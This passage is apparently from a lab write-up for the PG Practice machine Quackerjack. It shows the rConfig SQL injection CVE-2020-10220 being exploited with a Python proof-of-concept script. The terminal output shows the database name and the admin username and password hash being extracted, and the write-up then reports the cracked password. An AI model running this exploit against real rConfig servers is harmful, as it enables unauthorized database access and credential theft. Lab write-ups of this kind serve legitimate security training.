SQL Injection
The target rConfig instance is vulnerable to CVE-2020-10220 due to its outdated version; 3.9.4
Exploit Script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/quackerJack/exploits-rconfig]
└─$ python3 rconfig_sqli.py https://$IP:8081
rconfig 3.9 - SQL Injection PoC
[+] Triggering the payloads on https://192.168.144.57:8081/commands.inc.php
[+] Extracting the current DB name :
rconfig
[+] Extracting 10 first users :
admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
[+] Extracting 10 first devices :
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
DoneExecuting the exploit script exfiltrates the admin credential; admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Password Cracking
/Practice/Quackerjack/3-Exploitation/attachments/{A09054F4-A391-4782-92A2-90B492B9D7EE}.png)
Password hashes cracked for the admin user;abgrtyu
The credential may be user for exploitation